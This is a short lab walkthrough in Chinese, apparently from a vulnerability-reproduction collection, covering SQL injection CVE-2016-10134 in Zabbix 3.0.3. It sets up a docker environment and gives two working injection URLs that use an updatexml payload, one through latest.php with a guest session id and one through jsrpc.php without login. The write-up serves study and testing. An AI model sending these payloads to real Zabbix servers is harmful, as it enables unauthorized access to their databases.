zabbix latest.php SQL注入漏洞（CVE-2016-10134）

Path zabbix/CVE-2016-10134

zabbix是一款服務器監控軟件，其由server、agent、web等模塊組成，其中web模塊由PHP編寫，用來顯示數據庫中的結果。

運行環境

執行如下命令啟動zabbix 3.0.3:

docker-compose up -d

執行命令后，將啟動數據庫（mysql）、zabbix server、zabbix agent、zabbix web。如果內存稍小，可能會存在某個容器掛掉的情況，我們可以通過docker-compose ps查看容器狀態，并通過docker-compose start來重新啟動容器。

復現漏洞

訪問http://your-ip:8080，用賬號guest（密碼為空）登錄游客賬戶。

登錄后，查看Cookie中的zbx_sessionid，復制后16位字符：

將這16個字符作為sid的值，訪問http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)，可見成功注入：

這個漏洞也可以通過jsrpc.php觸發，且無需登錄：http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)：